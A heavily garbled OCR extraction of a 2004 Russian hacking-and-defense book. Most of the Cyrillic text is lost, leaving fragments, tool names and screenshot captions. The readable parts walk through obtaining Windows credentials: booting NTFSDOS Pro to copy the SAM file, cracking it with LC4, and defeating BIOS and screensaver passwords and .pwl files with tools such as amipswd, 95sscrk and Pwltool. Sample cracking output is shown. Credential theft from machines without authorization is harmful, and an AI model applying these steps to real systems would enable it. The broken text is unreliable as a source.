Alex WebKnacKer - Быстро и Легко. Хакинг и Антихакинг Защита и Нападение

SNMP Brute
Force Attack
WAN Killer
Security Check
Brutus-AET2
PeepNet
Zombie Zapper
Death n
Destruction 4.0
Invisible
KeyLogger
Stealth
Network Sonat
IP Network
Browser
Alex WebKnacKer
11 U AHTUXAKUHr
100 -.!
004.056.5
Alex WebKnacKer
. : .
. .: , 2004 400 .: .
ISBN 5-93673-025-5
:
! .
100 . -,
.
-
-:
www.3st.ru
ISBN 5-93673-025-5
, 2004
, 2004
..
, 2004

( )
1.
1.
2.
25
3.
36
4. Windows 2000/XP
46
2.
58
5.
58
6.
78
7.
95
3. -
113
8. Web
113
9.
....129
10.
148
11. ICQ
164
4. Web
180
12. Web-
181
13. DoS
209
5. TCP/IP
226
14. Windows 2000/XP
227
15.
242
16.
258
17.
277
18.
286
300
381
1.
XpoHuku
1.
1<
, - ,
, , , . , , . ,
( ).
!!!
, , .. ,
, 2 () .

.
,
:
log:
:
1:
2:
em: e-mail
.
, !
. 13.06.1999, "..
.
!!!
,
http://www.super-internet-provider.ru
1.
, .
, - , , , , , , , . , , ,

Web- .
-
, . - , . ,
, , , ,
.
- ,
, .
- , , , . ,
, !
, , ,
.
, , .
- , 80- , , , , - ,
.
.
Xakepbi u
, ,
, ,
.
,
, , .
.
( !),
.
- (-, !)
, ,
.
, ,
-
,
.
, , ,
, ,
, . , ,
,
, ,
, -
.
,

.
, . , , , , , ,

, .
, , ,
. , - ,
, ,
, .
20-
- .
1.
makoe ?
, , , , ,
, - , -
, ,
(, -
)
, . , - , .
, , .
( ).
, :
(, . ).
, ,
, .
Hard DISK [ Fdisk.exe] n- ( , ) .
! , ,
!
[ 24% ]
, POWER - !
IDE- .
, . , , , - , , , - , HARD DISK
- , - , - , .
, Must die,
.
Windows,
, .
,
, .
, Windows ? ,
, - ? , , , ,
.
, ?
21 ( ).
:
:

, , ,
, ,
. , .
:

, .
. ,
, ,
.
:
. .
, . .
, ,
.
.
: ,
.
, ? -
, , ?
,
?
1.
, - .
, , , , , ...
. , ,
, (, ,
) . , :
- , 16 19 .
( 80%) , nerd.
: 1) , ; 2)
. (, ?
- ).
Windows Unix,
TCP/IP
, , C++, Perl, Basic.
, .
- , - 19- . , ,
, , . , , ,
. ,
, -, , .
, , , .
-
, , , .
, . , ,
- , - .
.
, , , - . ,
. , , .
10
Takmuka
,
? - , - .
, ,
. , , ,
, , ,
. . ,
, .. . , ,
, ,
, . - .
, , - , '
, , . ,
, ,
, ?

, , - , , ,
.
- , , .
,
, , , ,
. , , , , ?
, , , .
xakepbi ?
, , , ,
, , , .
, , , ,
. , ,
, - , , , , . , .
1,
11

, ,
, , ,
. -, - - , , , . , ,
, , [2], , ,
, , ( ).
[2] 1991
125 500 , - , ,
.
- ...
-
-. 8, - . , -, Web-
, , .
. - .

.
.
, [2]
WebMoney (http://www.webmoney.ru)
, -,
WebMoney. ,
, WebMoney
?
12
SecurityLab.ru 23 2002

, Evans Data.
750 ,
12% ,
27%, ..
! , ,
,
.
, ,
,
, ,
, .
, - .
, , . , , , .. , , .
, , , .
, - , - ILOVYOU, ,
,
. , , ,
- . , , ( Yankee Doodle).
, , .
. -
, , , . , 19 ,
N3 2000 .? N5:
1.
, , ,
:). ,
, , ,
, . ,
, :). , ,
. , ,
. , , , :).
, ? - , ,
. , - .
, , ICQ-. ,
? 1 1 , ,
ICQ, . , . ,
,
[3].
DoS (Denial of Services - ), 13?
- Web-,
, Yahoo
(http://www.yahoo.com), , .
, , - ,
(, , )?
, ,
. , -
, , - , , Web- ?
!

-
. -
14
, , , , . , ,
, ( blackmail - ).
. --... , 19-
(. ) 19.
. [2] Bloomberg LP ,
, 200 000
. - , . -
, ( , ). [2], , ,
, , , ,
.
SecurityLab.ru
(http://www.securitylab.ru). 21 2002 .
28- . , , , ,
, 4 000 .
: ,
...
. SecurityLab.ru
! - .

. , , , - (Stealth)
Lockheed Martin (. [2]), , ,
, . , Lockheed
.
1!5
, SecurityLab.ru, -
.
13 2002
43 ! Rafa,
World of Hell ( ).
,
.
, ? SecurityLab.ru. ,
$59' 7
2002 .
Fortune 1000, , . ,
404 . , - 356 . .
(49%) ,
(36%) ,
(27%) - .
- 59 . !

SecurityLab.ru
,
. , , Symantec, , 64%,
2002 . 32 .
. ( SecurityLab.ru) , ,
.
, - ,
, , , .
, , .
-
, ,
. , 2004 .
.
? - , .
16
xakepbi ?
, , ? -
, , .
( , ) ,. - ,
, , .
, , .
-
, , Windows,
MS Word,
. , , , .
[2] .
- , MS Office Oracle. , , , 11 2002 SecurityLab.ru Oracle 9i ,

Oracle .
- ,
Oracle .
MS Word 6 .
,
. Windows 2000/XP - , . 4,
14 , Windows 2000/XP.
- . SecurityLab.ru 21 2002 Microsoft,
FTP- Microsoft, ZIP-. Wired News,
-
Microsoft. ,
! , , ,
Microsoft - Microsoft! , .
, ,
- (.. ), (..
),
(.. ). , , - , ..
, ,
, . ,
, ,
- , ?
- ,
. - . ,
. , , - , .
, -
; ,
- .
, . , , .
CVE (Common Vulnerabilities and Exposures - )
MITRE. MITRE (http://www.mitre.org) ,
,
,
Web-. CVE.
18
.
CVE-2002-0055
SMTP service in Microsoft Windows 2000, Windows XP Professional,
and Exchange 2000 to cause a denial of service via a command with a
malformed data transfer (BOAT) request. ( SMTP Microsoft
Windows 2000, Windows XP Professional Exchange 2000

)
Reference: BUGTRAQ:20020306 Vulnerability Details for MS02-012
Reference: MS:MS02-012
Reference: XF:ms-smtp-data-transfer-dos(8307)
Reference: BID:4204
, . , Internet Security Systems (ISS) (http://www.iss.net) - .. ,

. Web-
(, ), - FreeBSD,
Solaris, Windows 2000/XP .
SecurityLab.ru,
,
( , ,
).
, , , , - , - , ! , ! , ! - , - , , .
, ,
, .
Kak xakepbi
, ,
.. , .
, , . , ,
1.
, , .
, ,
,
,
. , , : - .

,
. ,
, , , , ,
[3].
, , , . ,
. , 3
, .
, , , , .
- - , .
- , , , . ,
, ,
.

,
.
20
.
. , ,
. , , . , - , , [2].
, ,
. , , (, ), ,
,
. - ,
.
, .
.
, -
-, , , Web-.
, , ,
.
, ( , )
, ,
DDoS (Distributed Denial of Services -
). DoS 13 .
- . , , Web-.
,
( - ,
Web). ,

-- ,
,
1.

.
,
9 10 .
-
Web-, - Web- .
, - Web- -
12. , - ,
19 -
. 3 4
.
, . , 14
TCP/IP
Windows 2000/XP.
.
,
. ,
, , .
? - , , , . - , . , - , sniffing - . ,
17 ,
TCP/IP 5 .

, , , ( ,
) . , - ,
, !
-
22
.
- ,
, . , , , , , ,
, . .
- , [3].
, , , .
, [3]. ,
.
18 PhoneSweep.
- , PhoneSweep
Windows 2000/XP,
.
Login
Hacker, TCH-Scan ToneLock. PhoneSweep -
.
, -
.
,
SecurityLab.ru - , , , . ....
- , , (), . ,
, 50%
, (!!!), , !!! ... - .
1.
23
Cokpbimue
, ,
, ,
. , . , - , . , , ,
.
,
, (.. ,
). ,
, ,
, , , .
, ,
, , ( rootkit -
). - UNIX,
Windows 2000 , 7,
, , , , Windows, , .
.
IP-,
.
-
.
, - , , -, - ,
.
, 7 -

,
, .
24
. ,
,
.
-
, ,
, .
-
,
. - .
2.

. , , , - .
- , ?
- , ,
.
, .. .
(., , [2]),
, , , ,
.
, , .
, ,
,
, ,
.
, ..
-
, ,
.
- . .
:
, , , -
(, ). , , IP-,
, .. ,

. , , .
26
, IP-
, Whols (,
http://www.ripe.net) IP-
, .
IP- ,
, , DoS, .
, DoS,
- , .
, , ,
.
.
.

.

-, , . - , ,
,
... , , , . , ,
. , ,
. , ,
.

, ,
( ) [2].

,
, , .
- , , , , , , , ,
2.
27
. ,
, , ,
. , ,
, .
, , , . . , . , ,
, ..
- , ( )
.

,
. , , 1 - ,
.
, , .
7.
Honbimka
1,
, ,
. , , , Retina (http://www.retina.com). , , .

. , , , , -
28
,
( ).

, , - , .
!<6
, DoS.

, .

, , Telnet.
, - , , -...
UcmoMHuku
,
? ,
.
. ,
Windows 2000/XP, ,
, , , , STARR.
. ,
, ,
TCPDump.
. IDS (Intrusion Detection System ). (, Blacklce Defender),
, . ,
IDS
.
2.
29
CpegcmBa
, , ,
. , ,
. , , .
,
, ,
. :
.
Windows 2000/XP , , FileWatch 1.00
foundstone_tools (http://www.foundstone.com).
. ,
- ,
. , , TCMonitor
The Cleaner (http://www.moosoft.com).
. , Windows 2000/XP , , , . ,
, , RealSecure (http://www.iss.net).
. , , DoS
.
,
IDS, , BlacklCE Defender (http://www.iss.net).
. . , , , .
, , , , TCActive
The Cleaner (http://www.moosoft.com).
30
.
,
, ,
Attacker 3.0 foundstone_tools (http://www.foundstone.com).
. ,
, , . Windows, , , SOLARWINDS (http://www.solarwinds.com).
,
, . , .
. , ,
,
. ?

,
, . . , , ,
.
,
, -
. - ,
, IDS, , BlacklCE Defender - , , ,
. , ( ).
.
, . , . , .
2.
31_
, , , 24 ,
, , , DoS. ,
, .
,
.
, , - ? ,
. ... , ,
- .

, . , ,
( ),
( ). .

- .
.
, .
,
,
[2].
, 1, ,
- , , .
, . , , , ,
.
,
:
32
.
[3,4] - ,
, .. ,
. , ,
, , , Windows 2000/XP.
,
. ( , ) ,
.
,
, , , .
. Windows 2000/XP
,
. Windows 2000/XP , - , , -
, Windows 2000/XP [6].
Windows 2000/XP 4.
. . , ,
. ,
, PGP Desktop Security (http://www.pgp.com),
NTFS. ,
- WinRAR, , .
VPN (Virtual Private Network - ), .
IDS. . Windows XP
, . , , WinRouter, ,
IDS, , BlacklCE Defender, . ,
, , Attacker 3.0
foundstone_tools (http://www.foundstone.com).
. , -
, ,
- . -
2.
33
,
.
Retina.
. . - .
Windows 2000/XP
, ,
.
. ,
, , Norton
Antivirus, MacAfee VirusScan, The Cleaner, .

, ,
, . Microsoft Windows 2000,
- Windows 2000.
- , , .
, (, ), Windows 2000/XP -
( , , , ).
Windows Norton Antivirus
Symantec, IDS BlacklCE Defender -
,
, , . - ,
, (
) , , .
, , .
- - , , ,
. , , .
. ,
IDS 2-1687
34
.
IP- . , , .
- ,
Web-
IP- ( ) (- ).
,
.
.
, , , , IP-
, , WhoIS,
. (, RIPE NCC
http://www.ripe.net) IP- , . , , .
ISP
-, .
. , , , (., , [5]),
, (, ). , - .
. - , - ,
,
, ,
, ,
, , DoS. , . , ,
DDoSPing UDP Flood foudstonejools, -, DoS, , . - , , 10. ,
.
2.
35
- ,

- ,
. ,
;
, , -
. , ,
- ,
, ,'
. , , , - .
3.

- ,
- . -
, ,
. ,
DoS ,
IDS.
, . , ,
. ,
, ,
, , , ,
.

.
,
.

, - , , .
, ,
.
1 ,
.
; , .
- ,
, , , , .
, , , . , [3] , -
3.
37
. ,
, [3] !
[1]. , (
). ,
, , - . , , ,
, ,
. ,
. , - , ,
.
, . , ,
,
. - .

. Web- (, RIPE NCC http://www.ripe.net). Web-, Whols,
, ,
.
, , , Web-. Yahoo
(http://www.yahoo.com), Rambler (http://www.rambler.ru).
. , , , , . , , , [3].
Google
(http://www.google.com),
. , ,
C:\WINNT, Windows NT/2000.
38
,
.
, , Teleport Pro,
12. ,
Web- ,
. , ,
HTML Web- - ,
, HTTP
. , , , , , , , , (
18 ).
, Web- - ,
, . , .
k
1 , , , . . .
-, , , , ..
, , . - SAM
(Security Account Manager - ), .
SAM - ,
5 ,
, , ,
, , LOphtCrack LC4 (http://www.atstake.com).
-, , , , Windows , MS Office . , .
,
3.
. Office Password 3.5
(http://lastbit.com/download.asp) Windows - , , .
6 Revelation
SnadBoy (http://www.snadboy.com). , ***** - , , -
Revelation .
,
, , , ,
, .
, D , , ,
, , .
-
?
, ,
- , - .
Amaka Web
- . , Web-,
,

-.
, Web, Web-,
Web- ,
. Web- 8 ,
HTML, ,
HTML 4.

,
. , Web-,

. , , ,
40
Rambler (http://www.rambler.ru) ...

, ,
, ,
, . 9
,
.
. , , 10 Death & Destruction Email Bomber - .
, . - , , ,
10 Brutus.
, , ICQ.
- IP- ICQ-
( flood - )
ICQ- , ! - , 11 ICQ Flooder, ICQ-MultiVar,
.
- , IP- ICQ- ICQ,
, .
, .
Amaka cepOepoB \l\leb

Web- , , , DoS, - . , IIS 5 (Internet Information
Server - ) Microsoft
.
Web- , Web-, -
3.
41
HTML . 12
, , CGIScan
Brutus, IIS
. 13 ,
DoS.
Web- ,
,
Web-. , DoS
, - , . Web-
, , CGI-. , , .

TCP/IP , ,
, , IP-,
, .
,
.
14 - SuperScan, foundstone_tools
(http://www.foundstone.com).
W2RK (Windows 2000 Resource Kit -
Windows 2000), ,
W2HK (Windows 2000 Hacker Tools - Windows 2000).
TCP/IP Windows
, SNMP (Simple Network Management Protocol - ). 14 , SOLARWINDS
(http://www.solarwinds.com) - IP Network
Browser, SNMP -
SNMP Brute Force Attack SNMP Dictionary Attack. W2RK
SOLARWINDS , W2RK
SNMP .
,
, , .
42

, , . , ,
-
, .
, . ,
, .
- . , ,
, ,
. 17
- SpyNet,

.
, , , . , ARP (Address Resolution Protocol -
),
. ARP, ,
. -
, . , Windows
Unix, 17 , ,
, .
, , VPN (Virtual Private
Network - ) , , -
. , , , ,
, .
3.
43

, W2RK (
Windows 2000) W2HK - Windows 2000,
. Windows (Explorer) Windows, . ,
, , password, .
[3], ,
,
, .

, , ,
password.txt , ISP.
, , . , NTFS Windows 2000/XP,
, ,
PGP Desktop Security.
-
- ,
, .. . 1
Web- , (., ,
http://www.securitylab.ru). 12 IIS. CGIScan
, . , - , , IIS 4. Web
, .
- , , . .
, ; , , - ( ). , , - -,
, - .
44

- ,
. - ,
. 14
NetBUS,
. - , .
- , , ,
.
. - , ,
. , , -
- , ,
... , , .

-
, ,
.

, . , .
- ,
,
.
TEMPEST, . -
, , ,
, .
.
3.
45
-
, , , , . , , ( ), , ? , , ,
,
?
, - ?
, , ( ),
, , , -
.
, .

. ,
, ,
1, . , ,
.
, ,
,
, .... , , - Windows 2000/XP.
4.
Windows 2000/XP
Windows 2000 TCSEC (Trusted Computer System Evaluation
Criteria - ) .
,
Windows 2000, , .
. .
.
, - ,
, ,
, , .. ,
- .

, ( log in - ), - , . ,
, ,
, .
Windows NT/2000/XP SAM (Security
Account Manager - ). SAM , , . SAM -
, 5
.
, . .
,
, , . ,
4. Windows 2000/XP
47^
, , .
, , , .., , , , . , , -, (,
, ) , , , .
,
, , , . Windows NT 4
NTLM (NT LAN Manager - NT). NTLM
Windows 2000/XP. NTLM,
, LM (LAN Manager - ),
, Windows

NTLM.
Windows 2000/XP Kerberos, , ,
. - Windows 2000/XP, -
Windows 2000 Kerberos.
- ,
Windows 2000/XP - . , ,
, ,
- .
, , , .
- . Windows , , , . ,
, .
, , ,
, ,
.
48
, Windows NT/2000/XP
.
, . ,
, . , ,
. ,
(Guest),
, - (User),
.
, , ,
. , (Administrators), ,
-
, , ...
,
, .
, , - , 2, .. , .
, , . , , , ,
, .
Windows NT/2000/XP,
, , - .
, 7, ,
, .
,
, , , , , ,
.
4. Windows 2000/XP
49^
,
11 , , .
, , [2], [6],
, -
Windows 2000/XP, ,
.
Kak Windows 2000/XP

Windows 2000/XP SRM
(Security Reference Monitor - ). SRM Windows 2000/XP, .. .
Windows 2000/XP , , SRM. .
LSA (Local Security Authority - ), ,
, LSA.
, LSA . , LSA , .
SAM (Security Account Manager - ), . , LSA.
AD (Active Directory - ),
AD .
,
LSA.
,
, :
, ,
Kerberos; , .
, , , : , , , /,
. SAM AD ,
LSA . ,
, , .. , SRM.
50
, ,
Windows 2000/XP. ,
. -,
(SAM AD); -, . ,
.
SAM
, , , ,
. , , , SAM AD,
. SAM %_%\58132\\5,
AD - %KOpHeBoii_KaTanor%\ntds\ntds.dit. , ,
, - ! ..
,
, , ,
, Windows 2000/XP. SAM
Windows NT 4 , NTLM , ,
,
LM,
Windows. LM , SAM , , LOphtCrack
(http://www.atstacke.com) ,
.
LOphtCrack
SAM,
, ,
pwdump (http://www.atstacke.com). Windows - pwdump SAM ,
LOphtCrack, - ,
LM - .
Service Pack 3 Windows NT 4, , Syskey
() , SAM.
Windows NT 4 Syskey ; Windows 2000/XP Syskey . LM NTLM Syskey
,
4. Windows 2000/XP
. ,
- ,
3-4 , . ,
1 Microsoft, - Microsoft!
Windows. ,
, .

Wincjows 2000/XP
, , , , ,
? .
, , Windows,
SID (Security
IDentifier), 48- ,
.
Windows 2000/XP SID,
Windows 2000 8.
. ,
, ? (, ..)
Windows ACL (Access Control List -
), (Access Control Entries -
). SID
. ACL
, , (Explorer) Windows, Windows 2000/XP.
ACL.
Windows 2000/XP (, ) LSA , SID SID , .
, ,
SRM 8 ACL , , .
52
, , - . ,
, - , . , .
- ACL , Windows 2000/XP . , (, NTKap http://www.rootkit.com). ,
ACL !
, - , ? , . ,
, Windows 2000/XP.
kanmoz
Windows NT 4 , ..
, Windows 2000/XP
ADS
(Active Directory Services). ADS Windows 2000,
Windows 2000 Server. , ,
.
- , , ,
, - ADS , , .. . , ,
IP- .
ADS , , - ,
.
OU (Organization Units), ,
, , , , ,
, OU. OU - , .. OU , OU .
4. Windows 2000/XP
53^
Windows 2000/XP
, . , . Windows 2000 , - , Windows 2000 Windows NT. ,
,
.
Windows 2000/XP
, . ,
,
. , .. .
, . , domen.
: com1.domen, comp2.domen...
, ,
, , domenl, domen2,... , ,
.
, domenl domen2 , domen2
domenl, domen2
comp1.domen2.domen1, comp2.domen2.domenl, ... compN.domen2.domenl. A
domenl domen2 , forest,
. ,
domenl compl.domenl.foresi, comp2.domenl.forest
,
domen2
compl. domen2.forest,
comp2.domen2.forest
.
, - ,
:

.
(Universal group), jvioryr , , .
54
(Global Group),
, ,
.
(Local group domain),
, .
ACL
. -
.
, , AD,
, , .
- AD SAM,
, SAM.
AD , AD, ,
( 10 ), AD , , , . , . ,
, ,
Window 2000, . , , LC4
LOpghtCrack .
, , - - .
Windows 2000
Windows 2000
, . - ,
, -, ,
. -,
D , ,
- . , ,
- ,
.
.
4. Windows 2000/XP
55^
- ,
- , AD. - - ,
- -.
- ,
.

. -,
- . -,
, - ,
, , , .
, , , . . - , , ,
LM, - LM
( , , [3]). Microsoft NTLM ( Service
Pack 3 Windows NT 4) NTLMv2 ( Service Pack 4 Windows NT 4).
, , Windows 2000 Kerberos,
- ,
.
.
, Windows 2000/XP Windows , LM. Windows 2000/XP Kerberos, NTLM LM.
- TCP- 88 , Kerberos, . -
LM
NTLM, LOphtCrack .
, - ,

. , ?
56
, , ,
.
, ,
.
,
. , , ,
.

,
. , , Windows 2000.
,
Microsoft , ,
. Windows XP

Windows.

Windows 2000/XP [7], . , ,
,
.
, , Retina, [7].
-, . -, , , VPN (Virtual Private
Network - ). VPN ,
. VPN
, .
, , , ,
(Bruce Schneier),
(Applied Cryptography), - .
,
- ,
, .
4. Windows 2000/XP
57^
, .
- , ..
.

Windows 2000/XP , .
SAM, LSA, SRM, ADS, LM, NTLM, Kerberos
.
Windows,
.
Windows 2000/XP, TCP/IP ADS ,
Microsoft Press Windows 2000.
2.

. ,
.
- , ,
.
5.

Window 2000/XP, ,
, , , ? , 2,
,
,
, . . ( ,
- . .)
- ,
. , , ,
( - ...).
, , . , , , ,
, ,
( - ).
? , -
5.
, . - .
, . ,
-
, - . , .
-, , - - , Windows. , ,
,
- ,
.
, , ,
(. 1), -
, . -
, , , - -.
-, , , Windows BIOS . , Windows 2000/XP .

,
- (, ). , , - MS-DOS !
- ,
. -, BIOS , BIOS
. .
-, BIOS ,
NTFS, Windows 2000/XP. , MS-DOS - -
, - .
, -, , ( - - ,
! , . , , ),
60

Windows 2000/XP. -
NTFSDOS Professional (http://www.winternals.com) Winternals Software LP, NTFS
MS-DOS. ,
, Windows 2000/XP
.
- , . NTFSDOS
Professional - .
NTFSDOS Pro
NTFSDOS Pro . Windows NTFSDOS Professional
NTFSDOS Professional Boot Disk Wizard (
NTFSDOS Professional). ,
NTFS. .
, FORMAT/S SYS
MS-DOS.
Windows XP Create an
MS-DOS startup disk ( MS-DOS).
> * NTFSDOS Professional
(Start * Programs * NTFSDOS Professional). (. 5.1).
his wizard will help you install Windows NT/2000/XP system files needed
by NTFSDOS Professional to run from a MS-DOS diskette or hard disk.
. 5.1. NTFSDOS Pro
5.
61
> Next ().

(. 5.2),
,
.
NTFSDOS Professional Boot Disk Wizard copies drrvers and system files from an existing Windows
NT/2000<P installation or CD-ROW to your hard disk or a pair of floppy diskettes.
If you wish to create bootable diskettes you must add MS-DOS to the diskettes yourself, either before or
after using this program. Use the FORMAT/S or SYS commands from a MS-DOS shell to make
bootable diskettes.
You can also make a bootable diskette on Windows XP by opening My Computer, selecting the
'Formaf option from the context menu of your diskette drive, and formatting a diskette with the 'Create
an MS-DOS startup disk" option checked.
Puc. 5.2.

> , Next (),
.
NTFSDOS Pro MS DOS
( 437).
(. 5.3) .
ding language information enables NTFSDOS Professional to correctly transla

le names between Unicode and your local character set.
NTFSDOS Pro uses the character set for the United States version of MS-DOS (code page 437) by default.
Select any additional character sets you use with DOS.
Japan, code page 932
Korean (Johab). code page 1361
Korean, code page 949
MS-DOS Canadian-French, code page 863
MS-DOS Icelandic, code page 861
MS-DOS Multilingual (Latin IX code page 850
MS-DOS Nordic, code page 865
MS-DOS Portuguese, code page 860
MS-DOS Slavic (Latin II), code page 852
Cancel
. 5..
62
> Next ().

NTFSDOS Pro
(. 5.4).
.pecify the name of your Windows NT/2000/XP installation directory, or a directory containing the required
Windows NT/2000/XP system files.
|C\ASFRoot
<Bock
Cancel
Puc. 5.4. Windows

Windows
NT/2000/XP, NTFSDOS Pro. , , C:\W1NNT, \I386
Windows NT/2000/XP, - Service Pack.
> Next ().
NTFSDOS Pro (. 5.5).
Spedfy the disk or directory from which you would like to run NTFSDOS professional. You may
select A: to specify a floppy disk.
Cancel
Puc. 5.5. NTFSDOS Pro

NTFSDOS Pro. MS-DOS,
5.
63
.. FAT FAT32. :
. Advanced () NTFSDOS Pro , MS-DOS.
> Next ().
NTFSDOS Pro (. 5.6).
nsert . (loppy labelled NTFSDOS Professional Disk 1
Press Next to copy files to A:\.
. 5.6. NTFSDOS Pro

> Next (),
(. 5.7).
nsert efloppy labelled NTFSDOS Professional Disk 1
Copying files to diskette...
Cancel
Puc. 5.7,

(. 5.7) Next
() . Windows XP NTFSPRO.EXE
64
, NTFS .
Windows NT/2000 . NTFSCHK.EXE,
NTFS.
(. 5.8)
NTFSDOS Professional.
necessary files hove been copied. You mey now reboot to MS-DOS
d begin using NTFSDOS Professional Edition.
Puc. 5.8. NTFSDOS Pro
> Finish (),

.
NTFSDOS Pro, .
NTFSDOS Pro . , ,
NTFSPRO.EXE, NTFS .
, ,
MS-DOS ,
FAT FAT32, NTFSDOS Pro
.
MS-DOS NTFS,
Windows 2000/XP . ,
( - ), , , . , -
, , , . ,
,
, .

5.
65
- SAM,
, , _/5132/.
SAM, , SAM, . , BIOS ,
. , ,
Setup BIOS (
- ...). ,
BIOS.
BIOS
BIOS ( ),
.
I0"*"!, Setup, BIOS,
.
CMOS. BIOS
Setup BIOS
.
- BIOS ,

. , CMOS , . , CMOS ,
BIOS , , BIOS. (, !). - ,
,
. .
, , (), , ,
CMOS. , , ..
BIOS. , ;
, ?
3-1687
66
BIOS - ,
Setup - , , [8], [10].
. Web- - BIOS.
- ,
, ,
BIOS? , -,
, ; .
, . 5.9 amipswd.exe
,
BIOS AMI CMOS . , ! , ...
MS-DOS Prompt
C:\Test>anip<>ud
CMOS AMI DIGS password decipherer v. 2.02
(lulhor: U. ShatOMsky, Tula.
Optimized a added by C c ) PSU-soft, P. Senjanov, St. Petersburg
CMOS password: 007
IE
. 5.9. BIOS !
sacmaBku
, BIOS , . -, BIOS , * , , BIOS
- . ,
, . , ? , , , , .. - , .
5.
67^
, Windows -
. Windows 95/98/NT/2000/XP
, , , , ,
Windows. ScreenLock iJen Software. , -
,
.
, Windows 95/98,
, Windows 95/98 . |[Esc|. TQ
. , Windows 95/98 .
, , , , ..,
. - Windows 95/98,
Windows 95/98 , ,
95sscrk. Windows 95/98
, . 5.10.
5 MS -DOS Prompt
Microsoft(R) Windows ?S
(OCopyright Microsoft Corp 1-1996.
C:M'IINIIOWS>cd ..\test
C:\Test>9Ssscrk
Uin95 Screen Saver Password Cracker ul.1 - Coded by Nobody (nobodyOrngelska.se)
(c) Copyrite 1997 Burnt Toad/ Enterprises - read 95SSCRK.TXT before usage!
No filename in cormand line, using default! (C:\UINOOUS\USER.DftT)
Raw registry file detected, ripping out strings
Scanning strings for password key...
Found password data! Decrypting ... Password is 007!
Cracking complete! Enjoy the passwords!
Puc. 5.10. !
-
68
, Windows Windows. CD-ROM

-, , ,
, Autorun.ini, Windows 95/98 ( Windows 2000/XP).
( ScreenLock) - Windows.
, - , Autorun.ini, CD-ROM
. , , ( ),
- . - - , !
...
, SSBypass (http://www.amecisco.com), , , Windows 95/98
. SSBypass $40,
. ,
- , Windows.

, , , . ,
, , (. 1) - ,
,
( -!), ... , ,
Web-.
, , , , . - .
Windows 95/98
,
. Windows NT/2000/XP ,
.
5.
69
4, -
SAM , . , .
SAM
SAM, SAM.
NTFSDOS Pro,
MS-DOS SAM
/_/132/ .
- , , LC4 - LOphtCrack
(http://www.atstake.com).
. 5.11 LC4 Import
().
, LC4
, . SAM :
> File * New Session ( ). , . 5.11.
Domain
Import From Local Machine

Import From Remote Registry.
Import From SAM File...
Import From Sniffer...
Import From .LC File...
Import From .LCS (LC3) File
Import From PWDUMP File...
?* nans 1^ i MI
i <o t
Use the Import menu to retrieve accounts to audit.
E Jll
___2_
n nnns.
. 5.11. LC4
Import * Import From SAM File ( *
SAM). SAM.
70
SAM, 1-3.
(. 5.12) Session * Begin Audit
( * ) .
lEVstake LC4 - [Untitledl 1
File
View
Domain
Import
Session
Help
8 | NTLM Pa?
1 User Name
Administrator
ASPNET
Guest
HelpAsststant
IUSFLALEX-3
' empty '
empty '
empty '
IWAM_ALEX-3
' empty '

' empty '
NewUsei
empty '
empty
1 II - \
mpoited 7 accounts
. 5.12. SAM
, , SAM, . , . 5.13, SAM.
j@slake LC4 - [Untitledl |
Import
(EALEX-3
ALEX-3
ALEX-3
ALEX-3
ALEX-3
ALEX-3
ALEX-3
Session
Help
Administrator
ASPNET
Guest
HelpAssillant
IUSR_ALEX-3
IWAM_ALEX-3
NewUsei
empty empty '

' empty '
' empty '
' empty-
Dictionary! ofl [CAProgiam Fites'i@stake\LC41,ivoids-english.dic]
Puc. 5.13. SAM !
5.
71
, - 007 , , .
, , 5
Pentium 2 400 . - , LC4
.
LC4 Auditing
Options For This Session ( ), . 5.14.
Auditing Options Foi This Session
Dictionary Crack Enabled
Dictionary List
The Dictionary Crack tests for passwords that are the same as the words listed in the
word file. This test is very fast and finds the weakest passwords.
Dictionary/Brute Hybrid Crack0
Enabled
Characters to prepend
^1 Characters to append
Common letter substitutions (much slower)
The Dictionary/Brute Hybrid Crack tests for passwords that are variations of the words in
the word file. It finds passwords such as "Dana99" or "monkeys!". This test is fast and
finds weak passwords.
Brute Force Crack0
Character Set:
Enabled
|A-ZandQ-9
Distributed
Part
1 Of L_
Custom Chatacttt SeUfel each ehauctwfc
The Brute Force Crack tests for passwords that are made up of the characters specified
in the Character Set. It finds passwords such as 'WeR3pH6s" or "vC5%S9+12b". This
test is slow and finds medium to strong passwords. Specify a character set with more
characters to crack stronger passwords.
Cancel
Puc. 5.14.
, LC4 :
Dictionary Crack ( ), Dictionary
List ( ), . LC4
, ,
. ,
, , , ,
.., .
72
Dictionary/Brute Hybrid Crack (/ ),

, / ,
, .
Password???, .
Brute Force Crack ( ), .
,
. Character Set ( ) ,
Custom (), Custom
Character Set (List each character) ( ( )) .
Distributed ()
. File Save
Distributed ( )
.
LC4
Windows NT/2000/XP.
Windows,
Windows 95/98, Pwltool.
.pwl
Windows 9x/Me .pwl, Windows.
,
, , - Pwltool (http://soft4you.com) (Vitas
Ramanchauskas) (Eugene Korolev).
, Windows 9x/Me,
? , .pwl , , ,
NetWare,
Windows, , .
, Pwltool - .
Pwltool RePWL, * * PwlTool Demo * Repwl (Start Programs
PwlTool Demo * Repwl). RePWL
. 5.15.
5.
73
Repwl (version 6.5. Demo)

PWL File
E:\WINDOWS \A1_EX.FWL
Cached passwords
Browse
User name | |ALEX

Password
Fl | CheckPass]
Brute force | SmartForce f Dictionary |
SearchPasswordFast
SearchPassword
CheckPassFast
Client/Server
Q Zombie mode
Help | | Adv
. 5.15. Repwl
Pwltool.
Cached passwords ( )
Windows
, - . .pwl,
Browse (), (
Windows /Me
).
.pwl ,
PWL File ( PWL). , Net Name ( ). Browse () Local Net Share's resources (
), . 5.16.
| tj Local Net Share's resources

Provider
|Type
SMicrosoftWind.
Microsoft Wind.
S Microsoft Wind.
SMicrosoftWind.
gMicrosoftWind.
Microsoft Wind.
g Microsoft Wind.
Microsoft Wind.
SMicrosoftWind
feMicrosottWind.
Scan
Disk
Disk
Disk
Disk
Disk
Disk
Disk
Disk
Disk
Server
Filter
I RemoteNerne
\\SWORD-2000\My Documents
\\SWORD-2000\NETLOGON
\\SWORD-2000\D
\\SWORD-2000\scripts
\\SWORD-2000\Update
\\SWORD-2000\My Document...
\\SWORD-2000\Test
\\SWORD-2000\My Downloads
\\SWORD-2000\SYSVOL
\\SWORD-2000
[ Connect |
Get
I Speed (kb/sj 1
9765.63
9765.63
9765.63
9765.63
9765.63
9765.63
9765.63
9765.63
9765.63
r^n
. 5.16. .pwl
74
, . Scan ()
. Filter ()
, Connect
() ,
Get () - .
User name ( ) Repwl (. 5.15)
.

, . Windows 95
Windows 3.1, Glide () .pwl . - .pwl Windows.
- , , , Password () ,
CheckPass ( ) - , . 5.17
.
User name: ALEX
Password found: 007
File: E:\WINDOWS\ALEX.PWL
User name: 'ALEX1
Password: '007'
Save As
Print
